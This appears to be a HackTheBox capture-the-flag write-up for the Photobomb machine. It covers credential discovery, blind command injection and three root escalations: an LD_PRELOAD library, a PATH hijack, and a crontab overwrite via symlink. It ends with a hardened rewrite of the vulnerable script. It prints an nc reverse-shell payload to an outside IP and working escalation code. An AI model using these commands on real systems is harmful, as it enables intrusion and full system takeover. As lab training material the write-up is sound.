HackTheBox — Photobomb

ARZ101
5 min read · Feb 11, 2023

Photobomb from HackTheBox was an easy machine. It involved finding credentials in a JavaScript file, which gave access to a page that generates an image file; the POST parameter controlling the file extension was vulnerable to blind command injection, giving a shell as the wizard user. Escalation to root was straightforward and could be done in several ways, one being abusing the PATH variable, since the find command was not invoked with its absolute path.

NMAP

Nmap scan report for 10.10.11.182
Host is up (0.093s latency).
Not shown: 54171 closed tcp ports (conn-refused), 11362 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Visiting the web server redirects us to photobomb.htb, so we need to add that name to the hosts file.

It shows a link that takes us to /printer, which asks for credentials.

We can find the credentials by checking the page source, which references a JS file containing them.

With these, we can access the printer page.

This page converts an image into either PNG or JPG at one of the dimensions listed on the site.

If we remove any of the POST parameters when downloading the file, it shows a stack trace revealing that the backend is a Ruby Sinatra server.

Foothold

We can see from the stack trace that the filetype parameter is checked for whether it contains either png or jpeg, so we can try command injection there. I tried appending the id command with ; but it didn't return any output.

So I tried making a curl request to my Python HTTP server instead, which succeeded, confirming blind command injection.

Using the OpenBSD nc reverse shell payload, URL encoded:

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.72 2222 >/tmp/f

Then stabilizing the shell with python3.

Privilege Escalation (root)

Running sudo -l shows that we can run cleanup.sh as root.

Method 1

From the output of sudo -l we can see that SETENV is enabled, which allows us to set environment variables for the command. That means we can set LD_PRELOAD, which holds the path of a shared library loaded before anything else, so we can abuse it by compiling the following program into a shared library that sets its uid to 0 and spawns bash -p, giving us a root shell.

#define _GNU_SOURCE /* setresuid() is declared in unistd.h only with this */
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* With -nostartfiles, _init is the library's entry point and runs at load time */
void _init() {
    unsetenv("LD_PRELOAD");   /* avoid re-triggering inside the spawned shell */
    setresuid(0, 0, 0);
    system("/bin/bash -p");
}

gcc -fPIC -shared -nostartfiles -o ./load.so ./test.c
sudo LD_PRELOAD=/tmp/load.so /opt/cleanup.sh

Method 2

Checking the script we are allowed to run:

#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

This script changes into /home/wizard/photobomb. With -s it checks that photobomb.log exists and is not empty, and with ! -L it checks that the log file isn't a symlink (to prevent symlink attacks); it then copies the contents of photobomb.log into photobomb.log.old and truncates the log file. Finally, find looks for all jpg files under source_images and makes root their owner.

Here find isn't run via its absolute path, so we can abuse it: using the environment variables SETENV lets us set, we create a file that spawns bash for us and prepend its directory to PATH, a classic PATH hijack.

sudo PATH=/tmp:$PATH /opt/cleanup.sh

Method 3

Going back to the script, the if condition checks photobomb.log but not photobomb.log.old, so we can symlink photobomb.log.old to /etc/crontab and put a crontab entry in the original log file; when the script copies the log, it writes through the symlink and overwrites the crontab file.

ln -sf /etc/crontab photobomb.log.old

Now place a bash script at /tmp/shell.sh that makes bash SUID (or a reverse shell, if you prefer):

#!/bin/bash
chmod +s /bin/bash

And the crontab entry to write into photobomb.log:

* * * * * root /tmp/shell.sh

Putting the crontab entry in photobomb.log means the script copies it into photobomb.log.old, which now points at the crontab file, so cron runs our script and makes bash SUID; we can then spawn bash with -p to run it as the SUID owner, root.
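As an added, defender-side example (not part of the original writeup or the box), here is a hardened rewrite of cleanup.sh that closes the holes used in Methods 2 and 3: it resets PATH so a caller-supplied PATH cannot redirect find, and it refuses to write through photobomb.log.old as well as photobomb.log when either is a symlink. The function names and the base-directory argument are my own; the sudoers entry itself (where SETENV should be dropped) is not shown on the page.

```shell
#!/bin/sh
# Hardened cleanup.sh (added example, not the box's own script).
set -eu
# Ignore whatever PATH the caller passed in (sudo SETENV): with PATH fixed
# here, bare names such as find/cat/chown resolve only from system dirs.
PATH=/usr/sbin:/usr/bin:/sbin:/bin
export PATH

# True only if $1 is absent or a plain file that is not a symlink.
is_plain_file() {
    [ ! -L "$1" ] && { [ ! -e "$1" ] || [ -f "$1" ]; }
}

# Rotate $1/log/photobomb.log into photobomb.log.old. Returns 1 and writes
# nothing if either path is a symlink or a non-regular file; the original
# only checked photobomb.log, which is the gap Method 3 uses.
rotate_log() {
    log="$1/log/photobomb.log"
    old="$1/log/photobomb.log.old"
    is_plain_file "$log" || return 1
    is_plain_file "$old" || return 1
    if [ -s "$log" ]; then
        cat "$log" > "$old"
        : > "$log"          # truncate in-shell, no external binary needed
    fi
}

# Chown the originals. Owner defaults to root:root as in the original
# script; the second argument exists so it can be exercised unprivileged.
protect_originals() {
    owner="${2:-root:root}"
    find "$1/source_images" -type f -name '*.jpg' -exec chown "$owner" {} +
}
```

The check-then-write in rotate_log still has a small race window, so the stronger fix is to stop running the script from a directory the wizard user can write to.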
